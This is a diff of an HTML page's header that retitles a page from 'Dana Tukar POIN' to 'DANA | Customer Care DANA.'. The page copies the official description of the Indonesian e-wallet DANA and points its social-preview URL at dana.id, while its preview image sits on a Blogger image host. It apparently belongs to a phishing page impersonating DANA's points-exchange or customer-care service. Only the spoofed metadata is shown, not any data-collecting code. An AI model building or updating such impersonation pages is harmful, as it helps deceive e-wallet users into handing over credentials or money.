--- a/ll/index.html
+++ b/ll/index.html
@@ -4,20 +4,20 @@
   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
   <meta name="theme-color" content="#118EEA">
   <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=0, maximum-scale=1">
-  <title>𝗗𝗮𝗻𝗮 𝗧𝘂𝗸𝗮𝗿 𝗣𝗢𝗜𝗡</title>
+  <title>𝗗𝗔𝗡𝗔 | 𝗖𝘂𝘀𝘁𝗼𝗺𝗲𝗿 𝗖𝗮𝗿𝗲 𝗗𝗔𝗡𝗔.</title>
   <meta name="description" content="DANA adalah bentuk baru uang tunai yang lebih baik. Transaksi apapun, berapapun dan dimanapun jadi mudah bersama DANA. Ambil bagian dalam transformasi keuangan digital di Indonesia sekarang!">
 
   <!-- Facebook Meta Tags -->
   <meta property="og:url" content="https://www.dana.id">
   <meta property="og:type" content="website">
-  <meta property="og:title" content="𝗗𝗮𝗻𝗮 𝗧𝘂𝗸𝗮𝗿 𝗣𝗢𝗜𝗡">
+  <meta property="og:title" content="𝗗𝗔𝗡𝗔 | 𝗖𝘂𝘀𝘁𝗼𝗺𝗲𝗿 𝗖𝗮𝗿𝗲 𝗗𝗔𝗡𝗔.">
   <meta property="og:description" content="DANA adalah bentuk baru uang tunai yang lebih baik. Transaksi apapun, berapapun dan dimanapun jadi mudah bersama DANA. Ambil bagian dalam transformasi keuangan digital di Indonesia sekarang!">
  <meta content="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgNxuzA7fuW5aFVzMu9EP1nufSGbJoR-sKP1Y3ULQhyphenhyphen3Eajm8qUHsbyVQCO0grL40EnHgzrSJwMwM_O-2lADHc-_sg1r0BXy9qyjJAxqIzqcBsTvczuepNjf9MvbyAY37CJ8g53hTcpgZIseJYlEPSYhJzBPmOlqP8Fwbzh0XpNNtubZNdqiH2p5mvKFBI/s720/IMG-20241031-WA0114.jpg" property="og:image">
   <!-- Twitter Meta Tags -->
   <meta name="twitter:card" content="summary_large_image">
   <meta property="twitter:domain" content="https://www.dana.id">
   <meta property="twitter:url" content="https://www.dana.id">
-  <meta name="twitter:title" content="𝗗𝗮𝗻𝗮 𝗧𝘂𝗸𝗮𝗿 𝗣𝗢𝗜𝗡">
+  <meta name="twitter:title" content="𝗗𝗔𝗡𝗔 | 𝗖𝘂𝘀𝘁𝗼𝗺𝗲𝗿 𝗖𝗮𝗿𝗲 𝗗𝗔𝗡𝗔.">
   <meta name="twitter:description" content="DANA adalah bentuk baru uang tunai yang lebih baik. Transaksi apapun, berapapun dan dimanapun jadi mudah bersama DANA. Ambil bagian dalam transformasi keuangan digital di Indonesia sekarang!">
   <meta content="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgNxuzA7fuW5aFVzMu9EP1nufSGbJoR-sKP1Y3ULQhyphenhyphen3Eajm8qUHsbyVQCO0grL40EnHgzrSJwMwM_O-2lADHc-_sg1r0BXy9qyjJAxqIzqcBsTvczuepNjf9MvbyAY37CJ8g53hTcpgZIseJYlEPSYhJzBPmOlqP8Fwbzh0XpNNtubZNdqiH2p5mvKFBI/s720/IMG-20241031-WA0114.jpg" property="og:image">
 
